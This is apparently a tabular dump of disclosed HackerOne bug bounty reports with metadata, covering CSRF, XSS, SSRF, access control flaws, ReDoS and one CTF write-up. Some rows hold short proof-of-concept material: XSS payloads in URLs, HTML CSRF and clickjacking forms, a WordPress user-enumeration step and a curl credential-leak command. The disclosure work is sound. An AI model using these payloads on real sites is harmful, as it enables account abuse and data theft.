id int64 110 2.48M | title stringlengths 3 150 | created_at stringdate 2011-07-27 19:59:52 2024-04-25 15:55:33 | substate stringclasses 5
values | vulnerability_information stringlengths 0 84.5k | reporter dict | team dict | has_bounty? bool 2
classes | visibility stringclasses 2
values | disclosed_at stringdate 2013-11-07 00:00:00 2024-05-15 23:05:13 | weakness dict | original_report_id int64 4.7k 2.38M ⌀ | vote_count int64 0 2.59k | structured_scope dict |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
411,337 | Forget password link not expiring after email change. | 2018-09-19T05:13:33.396Z | resolved | I found a token miss configuration flaw in chaturbate.com, When we reset password for a user a link is sent to the registered email address but incase it remain unused and email is updated by user from setting panel then too that old token [reset link] sent at old email address remains valid.
#A better explanation
1-... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/S6z7ivTTH8w7QA8J3RbpWRiM/9a55e00ecd2cdf18a7f40678e6836e4cdc90bf95eb4b50c43f5fb775da40bb65"
},
"... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "chaturbate",
"id": 30475,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The largest online adult cam site",
... | true | full | 2018-09-20T06:42:43.088Z | {
"id": 124,
"name": "Improper Authorization"
} | null | 35 | {
"asset_identifier": "chaturbate.com",
"asset_type": "URL",
"databaseId": 11722,
"max_severity": "critical"
} |
311,805 | Cross-origin resource sharing misconfig | 2018-02-02T21:19:34.071Z | duplicate | Description
An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.
T... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/117/520/2ca445c24a43aa38ee4d5937857f7dcbfc4da97b_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "semrush",
"id": 15966,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Online Visibility Management Platform.",
... | false | full | 2018-03-13T14:23:52.379Z | {
"id": 27,
"name": "Improper Authentication - Generic"
} | 193,559 | 3 | null |
385,322 | Open API For Username enumeration | 2018-07-23T07:32:50.020Z | not-applicable | We Can do username enumeration,
Reproduce:
1. Go any wordpress site.
#2.www.site.com/?author=1 (type ?author=1 at end of site)
3. You will get www.site.com/author/admin (now, admin is username of login panel of that site)
Thanks,
Sameer Phad
## Impact
- | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/vwlss7nfxhq42yveh4jh6876myka/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "wordpress",
"id": 55,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Beautiful sites of any kind.",
"name": ... | false | full | 2018-07-23T14:33:47.328Z | null | null | 24 | null |
139,398 | Read-Only user can execute arbitraty shell commands on AirOS | 2016-05-17T17:47:16.026Z | resolved | This vulnerability is very similar to #128750, but it avoid the solution applied to the last beta XM firmware.
In this report is used the last beta XM firmware: `XM.v6.0-beta9`
# Vulnerability
The vulnerability resides in the function `fetchCookies` file `remote.inc:117`. Just like last time is a non sanitization or ... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/033/613/8c3e2d95cf9be1554d0d1e8de292b45c73325047_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ui",
"id": 800,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Ubiquiti Inc.",
"twitter_hand... | true | full | 2016-08-05T09:36:57.491Z | {
"id": 58,
"name": "Command Injection - Generic"
} | null | 43 | null |
950,201 | HTML Injection at "city-mobil.ru" | 2020-08-03T13:31:55.282Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/CE24zD8tdJUYD6adpRS69L74/cccd3716a6d2e06174d2a41492445cb1d4bf85b4611a755bc810b9246a24d951"
},
... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mailru",
"id": 65,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Building the Internet since 1998",
"name"... | false | no-content | 2020-12-15T16:14:10.375Z | {
"id": 61,
"name": "Cross-site Scripting (XSS) - Reflected"
} | null | 11 | {
"asset_identifier": "Citymobil",
"asset_type": "OTHER",
"databaseId": 40415,
"max_severity": "critical"
} | |
488,371 | Insecure Storage and Overly Permissive Google Maps API Key in Android App | 2019-01-30T07:12:30.259Z | resolved | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/481/462/6495338f139b675efd88bbc4412fc76613b6df30_original.jpg/3c7b305354c9073c106ae3d1701798def... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mailru",
"id": 65,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Building the Internet since 1998",
"name"... | true | no-content | 2019-09-01T12:49:10.910Z | {
"id": 101,
"name": "Insecure Storage of Sensitive Information"
} | null | 10 | {
"asset_identifier": "ru.mail.cloud",
"asset_type": "GOOGLE_PLAY_APP_ID",
"databaseId": 240,
"max_severity": "critical"
} | |
272,588 | CSRF in Raffles Ticket Purchasing | 2017-09-28T04:08:10.330Z | resolved | Description:
========
An API endpoint get executed with no CSRF prevention, the endpoint did not verify session_id required in the post form. An attacker can crafted malicious form (Poc), which is executed by authenticated user action leading to huge balance lost.
Poc:
===
<!doctype html>
<html>
<head>
</head>
<bod... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/137/533/339f440fdc61b6dfeb663c8216d249618b8fd451_original.gif/9a55e00ecd2cdf18a7f40678e6836e4cd... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "unikrn",
"id": 2672,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "unikrn offers a world class comprehensive es... | true | full | 2018-04-10T02:10:08.175Z | {
"id": 45,
"name": "Cross-Site Request Forgery (CSRF)"
} | null | 19 | {
"asset_identifier": "unikrn.com",
"asset_type": "URL",
"databaseId": 453,
"max_severity": "critical"
} |
1,047,447 | HostAuthorization middleware does not suitably sanitize the Host / X-Forwarded-For header allowing redirection. | 2020-11-30T23:25:50.430Z | resolved | When a site is configured to use the `.tkte.ch` (leading dot) short form for domain name, ex:
```ruby
config.hosts << '.tkte.ch'
```
it is then sanitized in sanitize_string, where it is turned into a regex:
```ruby
def sanitize_string(host)
if host.start_with?(".")
/\A(.+\.)?#{Regexp.e... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/tktech",
"username": "tktech",
"verified": ... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "rails",
"id": 22,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Web development that doesn't hurt.",
"name"... | true | full | 2021-02-11T01:39:07.028Z | {
"id": 53,
"name": "Open Redirect"
} | null | 7 | {
"asset_identifier": "https://github.com/rails/rails",
"asset_type": "SOURCE_CODE",
"databaseId": 160,
"max_severity": "critical"
} |
1,406,495 | Ability to Disable the Login Attempt of any Shopify Owner for 24 hrs (Zero_Click) | 2021-11-21T14:12:27.876Z | resolved | Hello Team,
I Found a Bug in which Hacker Have Ability to Disable the Login Attempt of any Shopify Owner With (Zero_Click)
Summary:
----------
Proof of Concept;
-------------------
Credentials:
-------------
Victim = ███████.com (████████)
Hacker = █████████.com
Victim Sceanrio:
-----------------
Step 1 : Victi... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/hdt3mtd2ifw3l8eghlc8ks1z9u0j/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "shopify",
"id": 1382,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Shopify is a multi-channel commerce platfor... | true | full | 2022-02-15T06:20:35.527Z | {
"id": 102,
"name": "Client-Side Enforcement of Server-Side Security"
} | null | 57 | {
"asset_identifier": "accounts.shopify.com",
"asset_type": "URL",
"databaseId": 423,
"max_severity": "critical"
} |
1,927,480 | DiffieHellman doesn't generate keys after setting a key | 2023-03-31T13:33:05.838Z | resolved | DiffieHellman doesn't generate keys after setting a key
## Steps To Reproduce:
1. Instantiate: `const dh = crypto.createDiffieHellman(1024);`
2. Set private key:
```
//set private key to 2
dh.setPrivateKey(Buffer.from("02", 'hex'));
//outputs 02 (as expected)
console.log(dh.getPrivateKey().toString('hex'... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/7v1s2nnar9u3rbd28col4xwngzgi/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "nodejs",
"id": 22984,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Node.js JavaScript Runtime",
"name"... | false | full | 2023-07-20T20:59:27.162Z | {
"id": 227,
"name": "Inconsistency Between Implementation and Documented Design"
} | null | 7 | {
"asset_identifier": "https://github.com/nodejs/node",
"asset_type": "SOURCE_CODE",
"databaseId": 666,
"max_severity": "critical"
} |
94,230 | Cross-site Scripting in all Zopim | 2015-10-16T14:56:26.648Z | resolved | Hello.
This vulnerability works on all sites where there Zopim chat.
Vulnerable link:
https://www.zopim.com/#1=1&__zopim_widget_proxy=1.zopim.com/s/W/xdds/PIJ4+155G8p7LL3w/c/1444997086678%22%3E%3C/script%3E%3Csvg/onload=alert%28%22XSS%22%29%3E
Vulnerable param is __zopim_widget_proxy.
For XSS i used "></script><svg/onl... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/038/696/21beef0c831766fad769a95c8f2a66692c65dfc9_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "zendesk",
"id": 205,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Zendesk is a leading cloud-based customer se... | true | full | 2015-10-20T22:53:27.181Z | {
"id": 60,
"name": "Cross-site Scripting (XSS) - Generic"
} | null | 2 | null |
1,137,218 | Access control issue on invoice documents downloading feature. | 2021-03-26T13:17:25.719Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/icsb2flpwf8cufoi8q8sgdpeaxw4/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "moneybird",
"id": 1361,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Cloud accounting",
"name": "Moneybird... | true | no-content | 2021-04-01T14:16:18.532Z | {
"id": 26,
"name": "Improper Access Control - Generic"
} | null | 26 | {
"asset_identifier": "moneybird.com",
"asset_type": "URL",
"databaseId": 16186,
"max_severity": "critical"
} | |
1,474,536 | connect.8x8.com: admin user can send invites on behalf of another admin user via POST /api/v1/users/<User ID>/invites | 2022-02-08T16:13:35.632Z | resolved | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/ni07o23q7345senc7og6vhuqpkab/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "8x8-bounty",
"id": 49732,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "8x8 Bounty",
"twitt... | true | no-content | 2023-02-15T07:48:12.281Z | {
"id": 26,
"name": "Improper Access Control - Generic"
} | null | 94 | {
"asset_identifier": "connect.8x8.com",
"asset_type": "URL",
"databaseId": 61539,
"max_severity": "critical"
} | |
53,088 | SSRF vulnerability (access to metadata server on EC2 and OpenStack) | 2015-03-23T15:08:49.061Z | resolved | In bug [#50537](https://hackerone.com/reports/50537), **haquaman** reported a SSRF vulnerability in the meme creation section of Phabricator. Ticket [T6755](https://secure.phabricator.com/T6755) was created and the HackerOne issue was closed as "Won't fix".
[T6755](https://secure.phabricator.com/T6755) states that *... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/002/223/9346bb3a772b6433536cfbbe2a0a6c4c7a786fe9_original.jpg/3c7b305354c9073c106ae3d1701798def... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "phabricator",
"id": 18,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Phabricator is a collection of open sourc... | true | full | 2015-03-26T18:37:57.571Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 4 | null |
237,071 | X-Frame-Options | 2017-06-06T01:35:07.815Z | informative | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/154/935/5f618f48ba808be6d0258844f8d8922dad9c86eb_original.jpg/3c7b305354c9073c106ae3d1701798de... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "coinbase",
"id": 104,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Creating an open financial system for the w... | false | no-content | 2017-06-22T17:07:14.836Z | {
"id": 74,
"name": "UI Redressing (Clickjacking)"
} | null | 1 | null | |
14,494 | Clickjacking & CSRF attack can be done at https://app.mavenlink.com/login | 2014-06-02T22:25:15.066Z | resolved | Hello,
My name is Vineet bhardwaj. i am security researcher and i pen test your website( https://app.mavenlink.com/login) and i found there is click jacking attack and CSRF attack can be done.
POC:
<html><head>
<title> CSRF testing </title>
<style>
frame {
opacity: 0.5;
border: none;
position: absolute... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/006/510/7f9f38ce92d31dade42f9ff5a8bb1ba4c02204a6_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mavenlink",
"id": 48,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Mavenlink provides sophisticated software a... | false | full | 2014-09-19T15:35:11.812Z | {
"id": 45,
"name": "Cross-Site Request Forgery (CSRF)"
} | null | 2 | null |
50,776 | A user can edit comments even after video comments are disabled | 2015-03-10T09:12:26.084Z | resolved | A user can escalate privileges and edit his previous comments, when comments are disabled for a video.
Steps to verify:
1. Log into vimeo.com as Alice. Upload a video (say, video id - 118026546) and allow anyone to leave comments for that video .
2. Login as Bob and navigate to the video URL - https://vimeo.com/11... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/001/170/fc657d5dfd17ac30235e5687c8b2d9b461e0f64e_original.jpg/3c7b305354c9073c106ae3d1701798def... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "vimeo",
"id": 56,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Make life worth watching",
"name": "Vimeo",... | true | full | 2015-03-11T14:37:33.636Z | {
"id": 75,
"name": "Privilege Escalation"
} | null | 2 | null |
901,210 | Redmin API Key Exposed In GIthub | 2020-06-18T03:11:38.534Z | resolved | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/f5nhz1d1xaxs3tetz8pan9scp2dz/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
}... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mailru",
"id": 65,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Building the Internet since 1998",
"name"... | true | no-content | 2020-11-25T15:58:05.827Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 20 | {
"asset_identifier": "Foodplex",
"asset_type": "OTHER",
"databaseId": 49351,
"max_severity": "critical"
} | |
395,944 | Reflected XSS in the npm module express-cart. | 2018-08-16T11:34:50.254Z | resolved | > NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
I would like to report Reflected XSS in the npm module... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/avi3719",
"username": "avi3719",
"verified"... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "nodejs-ecosystem",
"id": 23949,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "This program was used to handle v... | false | full | 2019-02-15T06:25:38.924Z | {
"id": 61,
"name": "Cross-site Scripting (XSS) - Reflected"
} | null | 15 | {
"asset_identifier": "express-cart",
"asset_type": "SOURCE_CODE",
"databaseId": 10291,
"max_severity": "critical"
} |
1,067,004 | Sensitive data exposure via https://███████/secure/QueryComponent!Default.jspa - CVE-2020-14179 | 2020-12-27T13:46:56.469Z | resolved | ##Summary:
Information Disclosure vulnerability in outdated Jira.
##Description:
Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa en... | {
"cleared": false,
"disabled": true,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/ba56adcb299ff13a87475bf",
"username": "ba56adc... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "deptofdefense",
"id": 16064,
"offers_bounties": false,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "U.S. Dept Of Defens... | false | full | 2021-01-12T21:43:53.661Z | {
"id": 18,
"name": "Information Disclosure"
} | null | 3 | null |
1,569,926 | Credential leak when use two url | 2022-05-13T19:09:38.556Z | not-applicable | ## Summary:
Curl can leak user credentials if use two url.
## Steps To Reproduce:
1. curl -I -v -u aaa:bbb hackerone.com curl.se
2. the output is:
> Connected to hackerone.com (104.16.100.52) port 80 (#0)
> Server auth using Basic with user 'aaa' ... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/liang1",
"username": "liang1",
"verified": ... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "curl",
"id": 35663,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "cURL is an Open Source project providing a li... | false | full | 2022-06-27T06:55:01.273Z | {
"id": 87,
"name": "Insufficiently Protected Credentials"
} | null | 2 | {
"asset_identifier": "https://github.com/curl/curl",
"asset_type": "SOURCE_CODE",
"databaseId": 18844,
"max_severity": "critical"
} |
67,929 | Redirection Page throwing error instead of redirecting to site | 2015-06-14T18:45:01.721Z | resolved | Hello
I was just testing and found that http://anysite.com.com/index.php?ref="><svg/onload=window.onerror=alert;throw/XSS/;// does not shows the usual External link warning page, but shows some error page .
Thanks | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/003/771/41805267a81081c293979a5dbc0599bcc4af3ac2_original.png/d3dc6b2d7e2dc3657e8861b0d7e2dfca... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "security",
"id": 13,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Vulnerability disclosure should be safe, tra... | false | full | 2016-05-25T02:13:58.505Z | {
"id": 57,
"name": "Violation of Secure Design Principles"
} | null | 3 | null |
681,468 | The password recovery let users know whether an email address exists or not in the website | 2019-08-25T00:03:13.241Z | resolved | URL: https://apps.nextcloud.com/password/reset/
I have tried to recover the password for some emails:
test@test.com (exists)
teste@teste.com.br (does not exists)
After I clicked the "reset my password"'s button, the website informed that the email did not exist.
## Impact
This is a bad practice, and it is an invit... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/m4eqwpxb19wtullkuv0b4hno7cd6/3c7b305354c9073c106ae3d1701798defaaf5be84... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "nextcloud",
"id": 13291,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Access, share and protect your files, ca... | false | full | 2019-11-22T17:51:03.959Z | {
"id": 31,
"name": "Improper Restriction of Authentication Attempts"
} | null | 10 | {
"asset_identifier": "apps.nextcloud.com",
"asset_type": "URL",
"databaseId": 42,
"max_severity": "critical"
} |
2,012,135 | [CVE-2023-22799] Possible ReDoS based DoS vulnerability in GlobalID | 2023-06-04T08:02:09.284Z | resolved | I made a report and patch at https://hackerone.com/reports/1696752.
https://discuss.rubyonrails.org/t/cve-2023-22799-possible-redos-based-dos-vulnerability-in-globalid/82127
> There is a possible DoS vulnerability in the model name parsing section of the GlobalID gem. Carefully crafted input can cause the regular expr... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/000/012/811/4b35334fa2fcf93b2e510174e09470fb42bbf03a_original.gif/9a55e00ecd2cdf18a7f40678e6836e4c... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "ibb",
"id": 54349,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "The Internet Bug Bounty rewards security resea... | true | full | 2023-07-27T06:45:30.531Z | {
"id": 48,
"name": "Uncontrolled Resource Consumption"
} | null | 4 | {
"asset_identifier": "https://github.com/rails",
"asset_type": "SOURCE_CODE",
"databaseId": 80881,
"max_severity": "critical"
} |
872,190 | Plaintext storage of a password on kubernetes release bucket | 2020-05-12T19:19:27.083Z | informative | Report Submission Form
## Summary:
During my recon I found these two buckets dl.k8s.io and dl.kubernetes.io which actually redirects to https://storage.googleapis.com/kubernetes-release/.
By searching the string "password" under https://storage.googleapis.com/kubernetes-release/ I found a file called rsyncd.password (... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://profile-photos.hackerone-user-content.com/variants/NyGLUvi87hCNJqmipxC5NVtJ/3c7b305354c9073c106ae3d1701798defaaf5be844fb8fdfa49ca62f991a2c2c"
},
"... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "kubernetes",
"id": 39386,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "",
"name": "Kubernetes",
"twitt... | false | full | 2021-01-07T18:30:33.292Z | {
"id": 21,
"name": "Plaintext Storage of a Password"
} | null | 0 | {
"asset_identifier": "k8s.io",
"asset_type": "URL",
"databaseId": 34429,
"max_severity": "critical"
} |
304,708 | Information exposure via error pages (www.lahitapiola.fi Tomcat) | 2018-01-14T11:59:38.299Z | resolved | **Summary:**
Information exposure via error pages
**Description:**
Hello there!
I take the risk that this report might be closed as a N/A but because you are running outdated tomcat I wanted to take this risk and report this to you.
So here we go..
When you navigate to the page e.g.
https://www.lahitapiola.fi/cs/S... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/qnaqvuyajxqzh6ms6m1hih7hedxw/d3dc6b2d7e2dc3657e8861b0d7e2dfca1a6d513dd7... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "localtapiola",
"id": 8416,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "LocalTapiola’s products and services c... | true | full | 2018-03-02T04:59:45.904Z | {
"id": 82,
"name": "Information Exposure Through an Error Message"
} | null | 6 | {
"asset_identifier": "www.lahitapiola.fi",
"asset_type": "URL",
"databaseId": 1045,
"max_severity": "critical"
} |
1,984,060 | After the upload of an private file, using transformations, the file becomes public without the possibility of changing it. | 2023-05-11T14:54:33.064Z | resolved | ## Summary:
When an user uploads a private file, ex (Screenshot 1), where only he has access to. Using the "View transformations" function can generate different kinds of image transformations (Screenshot 2). But after the generation of that transformation for example clicking on the regenerate button next to profile.... | {
"cleared": false,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
"small": "/assets/avatars/default-25f7248a18bdf9e2dc8310319b148d66cff430fa0fade6c5f25fee1b8d7f27ed.png"
},
"url": "/limusec",
"username": "limusec",
"verified"... | {
"awards_miles": false,
"default_currency": "usd",
"handle": "mozilla",
"id": 61236,
"offers_bounties": true,
"only_cleared_hackers": false,
"pentest_feature_enabled?": false,
"pentest_retesting_ends_at": null,
"permissions": [],
"profile": {
"about": "Mozilla web bug bounty program specific to... | true | full | 2023-10-20T09:37:30.009Z | {
"id": 26,
"name": "Improper Access Control - Generic"
} | null | 54 | {
"asset_identifier": "phabricator.allizom.org",
"asset_type": "URL",
"databaseId": 635518,
"max_severity": "critical"
} |
1,068,934 | [h1ctf-Grinch Networks] MrR3b00t Saving the Christmas | 2020-12-30T19:02:05.093Z | resolved | > Disclaimer: Certain things are a bit modified to set the pieces for the story. Also you can find the flags for all 12 challenges in file F1138300 , Now enjoy :)
```
█▀▄▀█ █▀█ ░ █▀█ █▄▄ █▀█ █▀█ ▀█▀
█░▀░█ █▀▄ ▄ █▀▄ █▄█ █▄█ █▄█ ░█░ saves the Christmas
```
**_Episode - 0x00_ Pil0t.py**
It was a gloomy clear night, Mr.... | {
"cleared": true,
"disabled": false,
"hacker_mediation": false,
"hackerone_triager": false,
"is_me?": false,
"profile_picture_urls": {
